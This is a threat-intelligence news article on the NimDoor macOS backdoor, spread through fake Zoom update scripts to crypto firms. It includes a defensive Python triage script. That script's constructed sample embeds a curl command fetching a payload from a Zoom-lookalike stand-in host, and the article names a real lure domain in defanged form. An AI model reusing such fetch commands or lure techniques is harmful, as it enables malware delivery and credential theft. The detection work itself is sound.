North Korea-Linked Threat Actors Spread macOS NimDoor Malware via Fake Zoom Updates
A new threat campaign has emerged, targeting Web3 and crypto firms with a rare macOS backdoor disguised as a fake Zoom update. North Korea-linked hackers are using this tactic to spread their malware, known as NimDoor, which can persist on systems, reinfect itself if killed, and mimic legitimate AppleScript tools to avoid detection.
The threat actors employ a process injection technique and remote communications via wss (the TLS-encrypted version of the WebSocket protocol) in their attacks. This is an unusual choice for macOS threats, making NimDoor stand out from other malware variants.
How It Works
The attack chain starts with fake Zoom invites sent via Telegram and Calendly. Victims receive a script named “zoom_sdk_support.scpt” with 10,000 lines of padding and a typo (“Zook”), hiding its true function. The script fetches a second-stage payload from lookalike domains like support.us05web-zoom[.]forum, mimicking real Zoom URLs.
This launches the core malware, signaling a broader, targeted campaign with custom links per victim. The attackers dropped two Mach-O binaries (‘a’, written in C++, and ‘installer’, written in Nim) to /tmp, each triggering a separate infection chain. One of these binaries establishes persistence using deceptively named Nim binaries, while the other decrypts the malware used for data theft, including browser and Telegram data.
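As an added illustration (not code from the original article or from SentinelLABS), the following Python triage script scores an AppleScript file for the lure traits described above: thousands of padding lines, the “Zook” misspelling, and a fetch from a Zoom-lookalike host. The allowlist of legitimate Zoom domains, the scoring weights, the `.example` lookalike host and both sample scripts are constructed assumptions for this example.

```python
import re

# Hosts treated as legitimate Zoom infrastructure (an assumption for this
# example; production code should use its own maintained allowlist).
LEGIT_ZOOM_HOSTS = {"zoom.us", "zoom.com"}
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)
# Lines carrying no logic: blank lines or AppleScript comments.
PADDING_RE = re.compile(r"^\s*(--.*|#.*|\(\*.*\*\))?\s*$")


def refang(text: str) -> str:
    """Turn defanged notation such as 'zoom[.]forum' back into 'zoom.forum'."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def is_legit_zoom_host(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in LEGIT_ZOOM_HOSTS)


def analyse_script(text: str, padding_threshold: int = 1000) -> dict:
    """Score an AppleScript for the lure traits; 3 or more warrants a manual look."""
    text = refang(text)
    lines = text.splitlines()
    padding = sum(1 for line in lines if PADDING_RE.match(line))
    hosts = {h.lower() for h in URL_HOST_RE.findall(text)}
    lookalikes = sorted(h for h in hosts if "zoom" in h and not is_legit_zoom_host(h))
    typo = re.search(r"\bZook\b", text) is not None
    score = 0
    # Heavy padding: thousands of no-op lines dwarfing the real code.
    if padding >= padding_threshold and padding > 0.9 * len(lines):
        score += 2
    if lookalikes:  # fetches from a Zoom-lookalike host: the strongest signal
        score += 3
    if typo:  # the "Zook" misspelling noted in the reported lure: weak on its own
        score += 1
    return {"padding_lines": padding, "total_lines": len(lines),
            "has_zook_typo": typo, "lookalike_hosts": lookalikes, "score": score}


# Constructed samples (not real malware): a padded lure and a benign script.
SUSPECT = ("-- Zook SDK support helper\n" + "\n" * 1500 +
           'do shell script "curl -fsSL https://support.us05web-zoom.example/update"\n')
BENIGN = 'tell application "zoom.us" to activate\n-- see https://zoom.us/support\n'

if __name__ == "__main__":
    for name, sample in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, analyse_script(sample))
```

The `refang` step also lets the same function run over defanged indicator lists such as the `support.us05web-zoom[.]forum` domain quoted above.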
Technical Details
SentinelLABS’ analysis shows that this process decrypts two embedded binaries. The first carries an ad hoc signature and the identifier Target; it is benign and appears to do nothing other than generate random numbers.
The second binary has an ad hoc signature with the identifier trojan1_arm64. This malware uses rare macOS injection, complex encryption, and WebSocket C2 comms to exfiltrate system and user data. The InjectWithDyldArm64 binary has specific entitlements to allow the injection of these payloads.
What It Means
NimDoor is written in Nim, uses encrypted communications, and steals data such as browser history and Keychain credentials. Unlike typical campaigns, this variant includes encrypted configs, asynchronous execution, and a unique signal-based persistence mechanism.
The threat actors are continuing to explore cross-platform languages that introduce new levels of complexity for analysts. North Korean-aligned threat actors have previously experimented with Go and Rust, similarly combining scripts and compiled binaries into multi-stage attack chains.
Nim’s rather unique ability to execute functions during compile time allows attackers to blend complex behaviour into a binary with less obvious control flow, resulting in compiled binaries in which developer code and Nim runtime code are intermingled even at the function level. This makes it difficult for analysts to detect and analyze these threats.
Conclusion
North Korea-linked threat actors are using fake Zoom updates to spread their NimDoor malware on macOS systems. This campaign targets Web3 and crypto firms with a rare backdoor that can persist, reinfect itself, and mimic legitimate AppleScript tools. The use of process injection techniques, encrypted communications, and cross-platform languages makes this malware particularly challenging to detect and analyze.
As the threat landscape continues to evolve, it is essential for businesses and individuals to stay vigilant and take proactive measures to protect themselves from such threats. Regularly updating software, using strong passwords, and being cautious of suspicious emails and attachments can go a long way in preventing these types of attacks.
Stay Safe Online
Remember, cybersecurity is everyone's responsibility. Stay informed about the latest threats and take steps to protect yourself and your loved ones.